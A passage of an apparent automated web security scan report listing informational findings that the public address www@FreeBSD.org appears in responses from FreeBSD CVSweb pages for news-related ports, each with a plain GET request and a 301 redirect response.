<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.231. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newspost previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newspost

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newspost HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newspost/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.232. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsstar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newsstar

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsstar HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsstar/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.233. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/newsx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/newsx

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/newsx HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/newsx/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.234. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nget

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nget HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nget/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.235. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7098

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.236. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nnap previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nnap

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nnap HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nnap/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.237. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nntp

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.238. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpbtr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nntpbtr

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntpbtr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntpbtr/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:40 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.239. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpcache previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nntpcache

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntpcache HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntpcache/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:47 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7105

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.240. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nntpswitch previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nntpswitch

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nntpswitch HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nntpswitch/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:58 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.241. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/noffle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/noffle

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/noffle HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/noffle/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:33:59 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.242. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nzbget previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nzbget

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nzbget HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nzbget/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:01 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.243. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/nzbperl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/nzbperl

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/nzbperl HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/nzbperl/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:03 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.244. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/openftd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/openftd

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/openftd HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/openftd/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:04 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.245. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-Gateway previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-Gateway

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-Gateway HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-Gateway/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:04 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.246. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NNML previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-NNML

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-NNML HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-NNML/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.247. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NNTPClient previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-NNTPClient

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-NNTPClient HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-NNTPClient/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7109

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.248. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Article previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-News-Article

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-News-Article HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-News-Article/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:05 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7111

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.249. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-News-Article-NoCeM/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7117

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.250. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-News-Newsrc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-News-Newsrc

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-News-Newsrc HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-News-Newsrc/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.251. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-NewsLib previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-NewsLib

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-NewsLib HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-NewsLib/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:09 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.252. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Client-NNTP/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7124

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.253. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/p5-POE-Component-Server-NNTP/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:10 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7124

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.254. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pan previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/pan

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/pan HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/pan/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:11 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.255. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/papercut previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/papercut

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/papercut HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/papercut/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.256. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pgpmoose previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/pgpmoose

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/pgpmoose HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/pgpmoose/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:14 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.257. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/plor previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/plor

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/plor HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/plor/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.258. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-pynzb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/py-pynzb

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/py-pynzb HTTP/1.1
Host: www.freebsd.org
Accept: */*
